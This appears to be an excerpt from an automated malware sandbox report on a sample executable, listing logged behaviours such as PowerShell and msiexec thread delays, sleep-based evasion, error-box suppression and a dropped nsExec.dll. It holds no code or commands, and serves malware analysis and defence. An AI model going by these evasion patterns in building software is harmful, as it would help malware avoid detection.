      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599657Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599532Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599407Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599297Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599187Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599078Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598969Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598860Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598735Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598610Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598485Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598110Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597985Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597860Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597735Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597610Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597485Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597110Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596985Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596860Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596735Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596610Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596116Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596000Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595891Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595781Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595672Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595563Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595438Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595313Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595188Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595078Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594969Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594844Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7240Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2472Jump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dllJump to dropped file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep time: -9223372036854770s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -25825441703193356s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7588Thread sleep count: 8730 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -599875s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7588Thread sleep count: 1097 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -599766s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -599657s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep count: 31 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -599532s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -599407s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -599297s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -599187s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -599078s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -598969s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -598860s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -598735s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -598610s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -598485s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -598360s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -598235s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -598110s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -597985s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -597860s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -597735s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -597610s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -597485s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592Thread sleep time: -597360s >= -30000sJump to behavior
